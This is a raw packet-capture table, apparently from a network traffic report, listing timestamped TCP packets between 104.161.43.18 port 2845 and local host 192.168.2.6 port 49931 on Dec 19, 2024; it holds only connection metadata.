                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.715086937 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.715442896 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.715491056 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.715513945 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.716496944 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.716567993 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.716619015 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.717573881 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.717623949 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.717631102 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.718599081 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.718666077 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.718702078 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.719690084 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.719746113 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.719779015 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.720712900 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.720776081 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.720818043 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.721750021 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.721829891 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.721842051 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.722804070 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.722856998 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.722906113 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.723879099 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.723939896 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.723989010 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.724898100 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.725014925 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.725066900 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.725958109 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.726064920 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.726077080 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.726983070 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.727009058 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.727022886 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.728049040 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.728104115 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.728123903 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.729109049 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.729207993 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.729356050 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.730231047 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.730281115 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.730437040 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.731213093 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.731332064 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.731333017 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.732280016 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.732327938 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.732386112 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.733283043 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.733347893 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.733454943 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.734397888 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.734474897 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.734508038 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.735375881 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.735440016 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.735538006 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.736448050 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.736609936 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.736618042 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.737493038 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.737612009 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.737700939 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.738564014 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.738622904 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.738658905 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.739588976 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.739636898 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.739680052 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.740643978 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.740699053 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.740734100 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.741669893 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.741754055 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.741775036 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.742772102 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.742820978 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.742865086 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.743774891 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.743824005 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.743851900 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.744935989 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.744959116 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.745048046 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.745882988 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.746016979 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.746105909 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.747148991 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.747224092 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.747246981 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.747963905 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.748027086 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.748048067 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.749053955 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.749171019 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.749202967 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.750127077 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.750180960 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.750230074 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.751173973 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.751283884 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.751339912 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.752176046 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.752234936 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.752262115 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.753212929 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.753314018 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.753360033 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.754271030 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.754411936 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.754455090 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.755415916 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.755430937 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.755552053 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.756346941 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.756423950 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.756460905 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.757407904 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.757519007 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.757575035 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.758558035 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.758723974 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.758749008 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.759634972 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.759754896 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.759793997 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.760571003 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.760632992 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.760668039 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.761609077 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.761717081 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.761744022 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.762670994 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.762774944 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.762846947 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.763736010 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.763813019 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.763864040 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.764817953 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.764893055 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.764983892 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.765841007 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.765943050 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.766038895 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.766901016 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.766949892 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.766990900 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.767915964 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.767971992 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.767999887 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.821154118 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.906024933 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.906099081 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.906166077 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.906419039 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.906553984 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.906841040 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.907484055 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.907643080 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.907859087 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.908535957 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.908582926 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.908752918 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.909583092 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.909687996 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.910620928 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.910727024 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.910751104 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.911717892 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.911780119 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.911815882 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.912143946 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.912828922 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.912944078 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.913032055 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.913872004 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.914006948 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.914164066 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.914865971 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.914985895 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.915081978 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.915992975 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.916047096 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.916129112 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.916939974 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.917134047 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.917269945 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.918008089 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.918191910 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.918268919 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.919030905 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.919137955 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.919262886 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.920072079 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.920203924 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.920434952 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.921248913 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.921350956 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.921480894 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.922250986 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.922436953 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.922960997 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.923274994 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.923373938 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.923600912 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.924268961 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.924377918 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.924540997 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.925311089 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.925405025 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.926433086 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.926495075 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.926537037 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.927015066 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.927450895 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.927539110 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.927702904 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.928463936 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.928590059 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.928828955 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.929519892 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.929677963 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.930577993 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.930598021 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.930644035 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.931670904 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.931807995 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.931828976 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.931965113 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.932672977 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.932760000 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.932868958 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.933729887 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.933870077 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.934190035 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.934777021 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.934834003 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.935811996 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.935966969 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.935978889 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.936064959 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.936937094 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.937083960 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.937263966 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.937963963 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.938087940 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.938340902 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.938954115 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.939059019 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.939106941 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.940006971 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.940116882 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.940172911 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.941135883 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.941214085 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.941747904 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.942109108 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.942226887 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.942378044 CET499312845192.168.2.6104.161.43.18
